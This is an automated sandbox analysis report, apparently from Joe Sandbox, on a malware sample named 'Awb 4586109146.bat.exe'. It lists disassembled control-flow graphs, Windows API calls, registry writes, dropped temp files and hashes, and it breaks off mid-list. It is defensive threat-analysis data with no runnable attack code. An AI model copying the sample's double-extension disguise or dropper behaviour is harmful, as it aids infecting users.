913->916 914->903 916->873 917->900 918 403297-40329a 917->918 918->913
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CountTick$wsprintf
                                                                    • String ID: ... %d%%$JrA$@
                                                                    • API String ID: 551687249-1851874788
                                                                    • Opcode ID: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
                                                                    • Instruction ID: 5c504835c6c52170eea8577a9cac8da2a2598cbf1b76cdbdeb728d3f56fa2377
                                                                    • Opcode Fuzzy Hash: 9edc88f8172c04292c3df671f1e4f215f71192327047457aae68a0603d3020a5
                                                                    • Instruction Fuzzy Hash: AA517A71900219DBCB10DFA5DA84A9E7BB8AF04366F14417BEC14B72C0CB78DA40CBA9

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 919 40264a-402663 call 402c1f 922 402ac5-402ac8 919->922 923 402669-402670 919->923 924 402ace-402ad4 922->924 925 402672 923->925 926 402675-402678 923->926 925->926 927 4027dc-4027e4 926->927 928 40267e-40268d call 40621a 926->928 927->922 928->927 932 402693 928->932 933 402699-40269d 932->933 934 402732-402735 933->934 935 4026a3-4026be ReadFile 933->935 937 402737-40273a 934->937 938 40274d-40275d call 405e33 934->938 935->927 936 4026c4-4026c9 935->936 936->927 940 4026cf-4026dd 936->940 937->938 941 40273c-402747 call 405e91 937->941 938->927 947 40275f 938->947 944 4026e3-4026f5 MultiByteToWideChar 940->944 945 402798-4027a4 call 406201 940->945 941->927 941->938 944->947 948 4026f7-4026fa 944->948 945->924 950 402762-402765 947->950 951 4026fc-402707 948->951 950->945 953 402767-40276c 950->953 951->950 954 402709-40272e SetFilePointer MultiByteToWideChar 951->954 955 4027a9-4027ad 953->955 956 40276e-402773 953->956 954->951 957 402730 954->957 958 4027ca-4027d6 SetFilePointer 955->958 959 4027af-4027b3 955->959 956->955 960 402775-402788 956->960 957->947 958->927 961 4027b5-4027b9 959->961 962 4027bb-4027c8 959->962 960->927 963 40278a-402790 960->963 961->958 961->962 962->927 963->933 964 402796 963->964 964->927
                                                                    APIs
                                                                    • ReadFile.KERNELBASE(?,?,?,?), ref: 004026B6
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,?,?,?), ref: 004026F1
                                                                    • SetFilePointer.KERNELBASE(?,?,?,?,?,00000008,?,?,?,?), ref: 00402714
                                                                    • MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,?,?,?,?,00000008,?,?,?,?), ref: 0040272A
                                                                      • Part of subcall function 00405E91: SetFilePointer.KERNEL32(?,00000000,00000000,?), ref: 00405EA7
                                                                    • SetFilePointer.KERNEL32(?,?,?,?,?,?,00000002), ref: 004027D6
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: File$Pointer$ByteCharMultiWide$Read
                                                                    • String ID: 9
                                                                    • API String ID: 163830602-2366072709
                                                                    • Opcode ID: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                                    • Instruction ID: 0a1b8613d15e357d59cabb4a84863d73d9dad353ca9b6e0785da3ca47288b3a0
                                                                    • Opcode Fuzzy Hash: 19438e2e62ba8aece1a895eee3c3762f252ce0cb36923fbe756b3879527f42a2
                                                                    • Instruction Fuzzy Hash: 42511974D00219AEDF219F95DA88AAEB779FF04304F10443BE901B72D0DBB89982CB18

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 965 406624-406644 GetSystemDirectoryW 966 406646 965->966 967 406648-40664a 965->967 966->967 968 40665b-40665d 967->968 969 40664c-406655 967->969 971 40665e-406691 wsprintfW LoadLibraryExW 968->971 969->968 970 406657-406659 969->970 970->971
                                                                    APIs
                                                                    • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 0040663B
                                                                    • wsprintfW.USER32 ref: 00406676
                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040668A
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                    • String ID: %s%S.dll$UXTHEME$\
                                                                    • API String ID: 2200240437-1946221925
                                                                    • Opcode ID: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                    • Instruction ID: 9fa172bba6ca99a644905d2b6d7ed641771312ed853c50fe9922007c80c3d461
                                                                    • Opcode Fuzzy Hash: fcd04411c5a1f64f7e9219edfc5ac0d332aa1f587fd7b062781a7321f30925af
                                                                    • Instruction Fuzzy Hash: 7CF0FC70501119A6CF10BB64DD0EF9B365CA700304F10447AA54AF10D1EBB9DB64CB99

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 972 4057f1-40583c CreateDirectoryW 973 405842-40584f GetLastError 972->973 974 40583e-405840 972->974 975 405869-40586b 973->975 976 405851-405865 SetFileSecurityW 973->976 974->975 976->974 977 405867 GetLastError 976->977 977->975
                                                                    APIs
                                                                    • CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                    • GetLastError.KERNEL32 ref: 00405848
                                                                    • SetFileSecurityW.ADVAPI32(?,80000007,00000001), ref: 0040585D
                                                                    • GetLastError.KERNEL32 ref: 00405867
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                    • String ID: C:\Users\user\Desktop
                                                                    • API String ID: 3449924974-1876063424
                                                                    • Opcode ID: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                    • Instruction ID: d156970015101e62572267df52bf1fb018b172c5ebb67f048bc3511340661aba
                                                                    • Opcode Fuzzy Hash: 817c7eeb2e6ade2cce28f3b9d2e4670c9c7091e2f59c9eba6f9578a5288f1365
                                                                    • Instruction Fuzzy Hash: EB010872D00219EADF009FA1C944BEFBBB8EF14304F00803AE945B6280D7789618CFA9

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 978 405ddf-405deb 979 405dec-405e20 GetTickCount GetTempFileNameW 978->979 980 405e22-405e24 979->980 981 405e2f-405e31 979->981 980->979 982 405e26 980->982 983 405e29-405e2c 981->983 982->983
                                                                    APIs
                                                                    • GetTickCount.KERNEL32 ref: 00405DFD
                                                                    • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,"C:\Users\user\Desktop\Awb 4586109146.bat.exe",0040338D,1033,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75573420,004035D9), ref: 00405E18
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CountFileNameTempTick
                                                                    • String ID: "C:\Users\user\Desktop\Awb 4586109146.bat.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                    • API String ID: 1716503409-2182324452
                                                                    • Opcode ID: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                    • Instruction ID: af8b6ba947558e1b0daa3aed001b6e0f80e178ffca66ecedc63f3e0829e9a41e
                                                                    • Opcode Fuzzy Hash: 579317ece081e1c49d3b274132234632dc0f80c8b4471fc5797a0d742f25062f
                                                                    • Instruction Fuzzy Hash: 61F03076A00304FBEB009F69ED05E9FB7BCEB95710F10803AE941E7250E6B09A548B64

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 984 73961777-739617b6 call 73961b5f 988 739618d6-739618d8 984->988 989 739617bc-739617c0 984->989 990 739617c2-739617c8 call 73962352 989->990 991 739617c9-739617d6 call 73962394 989->991 990->991 996 73961806-7396180d 991->996 997 739617d8-739617dd 991->997 998 7396180f-7396182b call 73962569 call 739615b4 call 73961272 GlobalFree 996->998 999 7396182d-73961831 996->999 1000 739617df-739617e0 997->1000 1001 739617f8-739617fb 997->1001 1022 73961885-73961889 998->1022 1005 73961833-7396187c call 739615c6 call 73962569 999->1005 1006 7396187e-73961884 call 73962569 999->1006 1003 739617e2-739617e3 1000->1003 1004 739617e8-739617e9 call 73962aac 1000->1004 1001->996 1007 739617fd-739617fe call 73962d37 1001->1007 1010 739617e5-739617e6 1003->1010 1011 739617f0-739617f6 call 73962724 1003->1011 1017 739617ee 1004->1017 1005->1022 1006->1022 1020 73961803 1007->1020 1010->996 1010->1004 1021 73961805 1011->1021 1017->1020 1020->1021 1021->996 1026 739618c6-739618cd 1022->1026 1027 7396188b-73961899 call 7396252c 1022->1027 1026->988 1032 739618cf-739618d0 GlobalFree 1026->1032 1034 739618b1-739618b8 1027->1034 1035 7396189b-7396189e 1027->1035 1032->988 1034->1026 1037 739618ba-739618c5 call 7396153d 1034->1037 1035->1034 1036 739618a0-739618a8 1035->1036 1036->1034 1038 739618aa-739618ab FreeLibrary 1036->1038 1037->1026 1038->1034
                                                                    APIs
                                                                      • Part of subcall function 73961B5F: GlobalFree.KERNEL32(?), ref: 73961DB2
                                                                      • Part of subcall function 73961B5F: GlobalFree.KERNEL32(?), ref: 73961DB7
                                                                      • Part of subcall function 73961B5F: GlobalFree.KERNEL32(?), ref: 73961DBC
                                                                    • GlobalFree.KERNEL32(00000000), ref: 73961825
                                                                    • FreeLibrary.KERNEL32(?), ref: 739618AB
                                                                    • GlobalFree.KERNEL32(00000000), ref: 739618D0
                                                                      • Part of subcall function 73962352: GlobalAlloc.KERNEL32(00000040,?), ref: 73962383
                                                                      • Part of subcall function 73962724: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,739617F6,00000000), ref: 739627F4
                                                                      • Part of subcall function 739615C6: wsprintfW.USER32 ref: 739615F4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3746698006.0000000073961000.00000020.00000001.01000000.00000006.sdmp, Offset: 73960000, based on PE: true
                                                                    • Associated: 00000000.00000002.3746632612.0000000073960000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746839235.0000000073964000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3746909776.0000000073966000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_73960000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Global$Free$Alloc$Librarywsprintf
                                                                    • String ID:
                                                                    • API String ID: 3962662361-3916222277
                                                                    • Opcode ID: 58b48bd3c5d9bc9198811c75d1319ba26633cbab0f2328db9d62cf8ca1e4361c
                                                                    • Instruction ID: 82ba49fe69d4bfe28995f96736068f3b789bbe48da7b5881affc6107553d4947
                                                                    • Opcode Fuzzy Hash: 58b48bd3c5d9bc9198811c75d1319ba26633cbab0f2328db9d62cf8ca1e4361c
                                                                    • Instruction Fuzzy Hash: E241BEB2402348EBEB119F749994B9637BCBF04395F185079E94B9E1C6DBB8C084C7A3
                                                                    APIs
                                                                    • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C8F
                                                                    • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CA7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Timeout
                                                                    • String ID: !
                                                                    • API String ID: 1777923405-2657877971
                                                                    • Opcode ID: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                    • Instruction ID: 9b2162bbfebbb1b7b3748198b6c02d748cac4cdb6124cb19748b2f92d1b33cd7
                                                                    • Opcode Fuzzy Hash: 7e3eeff1b63bcc2d517f183bf836ef2b026841584b0bf51ee9d38dd24623c36e
                                                                    • Instruction Fuzzy Hash: 8E219371948209AEEF059FB5DE4AABE7BB5EF84304F14443EF605B61D0D7B889409B18
                                                                    APIs
                                                                    • lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nscEFD5.tmp,00000023,00000011,00000002), ref: 0040242F
                                                                    • RegSetValueExW.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nscEFD5.tmp,00000000,00000011,00000002), ref: 0040246F
                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscEFD5.tmp,00000000,00000011,00000002), ref: 00402557
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: CloseValuelstrlen
                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nscEFD5.tmp
                                                                    • API String ID: 2655323295-1665735499
                                                                    • Opcode ID: 9f44fae4feaf80abe13c7d1901b8792fbf05e0e188fbec8c03c8727959a673d1
                                                                    • Instruction ID: 076fdad28fc4eb621c0ae83062707e46e05f76c541c0890e85279b1380dde0ba
                                                                    • Opcode Fuzzy Hash: 9f44fae4feaf80abe13c7d1901b8792fbf05e0e188fbec8c03c8727959a673d1
                                                                    • Instruction Fuzzy Hash: F1118471D00108BEEB10AFA5DE89EAEBA74EB44754F15803BF504F71D1DBB48D409B28
                                                                    APIs
                                                                    • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402DA9
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DB2
                                                                    • RegCloseKey.ADVAPI32(?,?,?), ref: 00402DD3
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000046E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3699001436.0000000000473000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_400000_Awb 4586109146.jbxd
                                                                    Similarity
                                                                    • API ID: Close$Enum
                                                                    • String ID:
                                                                    • API String ID: 464197530-0
                                                                    • Opcode ID: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                    • Instruction ID: fc7ade2e12cd9e993d25f9a328d8db16c9603ee1eb20de8c24b8f84b94a82c23
                                                                    • Opcode Fuzzy Hash: a4e23b119c2c64eb18a4fa0724f9b8d9fe0ec592ff9815e45bdb7592abe1cef3
                                                                    • Instruction Fuzzy Hash: B4116A32500109FBDF02AB90CE09FEE7B7DAF54340F100076B904B51E1E7B59E21AB68
                                                                    APIs
                                                                      • Part of subcall function 00405C3A: CharNextW.USER32(?,?,C:\,?,00405CAE,C:\,C:\,?,?,75573420,004059EC,?,C:\Users\user\AppData\Local\Temp\,75573420,00000000), ref: 00405C48
                                                                      • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C4D
                                                                      • Part of subcall function 00405C3A: CharNextW.USER32(00000000), ref: 00405C65
                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A
                                                                      • Part of subcall function 004057F1: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405834
                                                                    • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\sillinesses,?,00000000,000000F0), ref: 0040164D
                                                                    Strings
                                                                    • C:\Users\user\AppData\Local\sillinesses, xrefs: 00401640
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.3698763362.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000000.00000002.3698743809.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698783736.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000416000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.3698803700.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
